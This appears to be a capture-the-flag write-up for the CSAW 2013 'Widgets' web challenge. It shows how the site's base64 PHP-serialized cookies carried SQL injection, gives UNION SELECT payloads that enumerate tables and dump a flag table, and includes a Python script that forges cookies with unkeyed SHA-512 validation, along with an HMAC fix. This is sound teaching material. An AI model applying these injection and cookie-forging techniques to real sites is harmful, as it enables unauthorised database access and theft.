Thursday, September 26, 2013

CSAW CTF Quals: Web 400 - Widgets

The first step is to register an account on the site and log in with it; any username and password will do.

If you explore the page you will find a background image of a dog. The CSS also contained an ASCII-art dog and the text "Doge flage is the key," which was later changed to "doge flage is not the key." These were all red herrings and played no part in finding the key.

You could also create widgets on the site, and after some observation you could see the cookies change each time a new widget was created.

The widget_tracker cookie was base64 encoded and decoded to a PHP-serialized array (the output of PHP's serialize()) along the lines of:
a:"number of widgets":{i:0;i:"widget one id";i:1;i:"widget two id";}
Here a:N: declares an array of N entries, each entry is an integer key i:K; followed by its value, and a value is written i:V; for an integer or s:LEN:"V"; for a string of LEN bytes.
The widget_validate cookie was simply the SHA-512 hash (a hash, not encryption) of that string. Since the hash has no secret key, a client can recompute it for any modified widget_tracker, so it does not actually protect the cookie's integrity.

After a lot of testing, we found that the cookies could be modified and sent back containing SQL injections. The format for them was:
a:"number of widgets":{i:0;s:"length of injection":"injection";}
A useful tool for editing cookies is the "edit this cookie" extension for Chrome. Remember to set the value after "s:" to the length of the injection string in bytes; if the declared length does not match, unserialize() rejects the cookie and the payload never reaches the query.

By experimenting with SQL injections we determined that the original query selected four columns (so a UNION must supply four), and we listed every table in information_schema with the following cookie value. The leading 7933 is an existing widget id and the ")" closes the parenthesis the id is interpolated into:
a:1:{i:0;s:109:"7933 or 1-1) UNION SELECT TABLE_NAME, TABLE_NAME, TABLE_NAME, TABLE_NAME  FROM information_schema.tables; -- ";}

Among those tables was one named flag, so a new cookie was built to dump it (the 1, 2, 3 pad the column count up to four):
a:1:{i:0;s:44:"7933) UNION SELECT *, 1, 2, 3 FROM flag; -- ";}

This gave the base64 widget_tracker cookie (the trailing %3D is a URL-encoded "="): YToxOntpOjA7czo0NDoiNzkzMykgVU5JT04gU0VMRUNUICosIDEsIDIsIDMgRlJPTSBmbGFnOyAtLSAiO30%3D

Hashing the serialized string with SHA-512 gave the matching widget_validate cookie: 17cd76a036f7541bac1e669ffada8a9389848e9bd19606689860a294f37800216bd6cfa37c2ff2a402c7809b94fb28185958ddfeb14373f0d4694c48a9704682
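The whole cookie-forging procedure above (serialize the payload with a correct s:LEN, base64 it, recompute the unkeyed SHA-512), written out as an added Python example; this is not the challenge's code or the author's tooling. It also includes a small reader for the serialized format so a captured widget_tracker can be decoded, and, going one step beyond the writeup, the keyed check the flag's name asks for. Assumptions: the payload strings are the ones quoted above, widget_validate is SHA-512 over the serialized string as the writeup states (the page does not say whether the server hashed the base64 form instead, so try that if the first is rejected), and SERVER_SECRET is a hypothetical server-side key that does not appear on the page.

```python
import base64
import hashlib
import hmac
import re
from urllib.parse import quote, unquote

# Payloads quoted from the writeup; the s:LEN prefix is computed, never hand-counted.
ENUM_TABLES = ("7933 or 1-1) UNION SELECT TABLE_NAME, TABLE_NAME, TABLE_NAME, TABLE_NAME"
               "  FROM information_schema.tables; -- ")
DUMP_FLAG = "7933) UNION SELECT *, 1, 2, 3 FROM flag; -- "


def php_serialize_array(values):
    """Build the PHP serialize() form of a list: a:N:{i:0;<v0>i:1;<v1>...}.
    Ints become i:V; and strings s:LEN:"V"; where LEN is the UTF-8 byte length."""
    body = ""
    for idx, v in enumerate(values):
        if isinstance(v, int):
            body += f"i:{idx};i:{v};"
        else:
            body += f'i:{idx};s:{len(v.encode())}:"{v}";'
    return f"a:{len(values)}:{{{body}}}"


def php_unserialize_array(data):
    """Minimal reader for the flat int/string arrays seen in widget_tracker.
    Strings are sliced by their declared byte length, so quotes inside values are safe."""
    raw = data.encode() if isinstance(data, str) else data
    head = re.match(rb"a:(\d+):\{", raw)
    if not head:
        raise ValueError("not a serialized PHP array")
    pos, out = head.end(), []
    for _ in range(int(head.group(1))):
        key = re.match(rb"i:\d+;", raw[pos:])            # integer key i:K;
        if not key:
            raise ValueError("expected integer key at offset %d" % pos)
        pos += key.end()
        if raw.startswith(b"i:", pos):                    # integer value i:V;
            m = re.match(rb"i:(-?\d+);", raw[pos:])
            out.append(int(m.group(1)))
            pos += m.end()
        elif raw.startswith(b"s:", pos):                  # string value s:LEN:"V";
            m = re.match(rb's:(\d+):"', raw[pos:])
            start = pos + m.end()
            n = int(m.group(1))
            out.append(raw[start:start + n].decode())
            pos = start + n + 2                           # skip the closing ";
        else:
            raise ValueError("unsupported value type at offset %d" % pos)
    return out


def decode_tracker(cookie):
    """widget_tracker cookie -> serialized string (URL-decode, then base64-decode)."""
    return base64.b64decode(unquote(cookie)).decode()


def forge_cookies(injection):
    """Return (serialized, widget_tracker, widget_validate) for one injected widget.
    widget_validate is the unkeyed SHA-512 the writeup describes, so the client
    can always produce a matching value for whatever it puts in widget_tracker."""
    serialized = php_serialize_array([injection])
    tracker = quote(base64.b64encode(serialized.encode()).decode())   # '=' -> %3D
    validate = hashlib.sha512(serialized.encode()).hexdigest()
    return serialized, tracker, validate


# --- the fix the flag name asks for: a keyed MAC (hypothetical, not on the page) ---
SERVER_SECRET = b"hypothetical-server-only-secret"   # assumption: never sent to clients


def hmac_tag(serialized):
    """HMAC-SHA512(SERVER_SECRET, serialized); only the server can compute this."""
    return hmac.new(SERVER_SECRET, serialized.encode(), hashlib.sha512).hexdigest()


def validate_with_hmac(serialized, tag):
    """Accept the cookie only if the tag was produced with the server secret.
    compare_digest keeps the comparison constant-time."""
    return hmac.compare_digest(hmac_tag(serialized), tag)


if __name__ == "__main__":
    for payload in (ENUM_TABLES, DUMP_FLAG):
        ser, trk, val = forge_cookies(payload)
        print(ser)
        print("widget_tracker  =", trk)
        print("widget_validate =", val)
        # Round-trip: the reader recovers exactly the injected string.
        assert php_unserialize_array(decode_tracker(trk)) == [payload]
        # With a keyed MAC the same forged pair would be rejected.
        print("accepted by HMAC check:", validate_with_hmac(ser, val))
```

Running it prints the two serialized payloads with s:109 and s:44 respectively, the same %3D-terminated base64 shown for the flag query, and a SHA-512 hex digest for each; the HMAC check rejects both forged pairs because the client never had the key.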

These were submitted and the page was refreshed (shown below).

If you inspect an element on the page and sift through the source you will find the key: "key{needs_moar_hmac}"

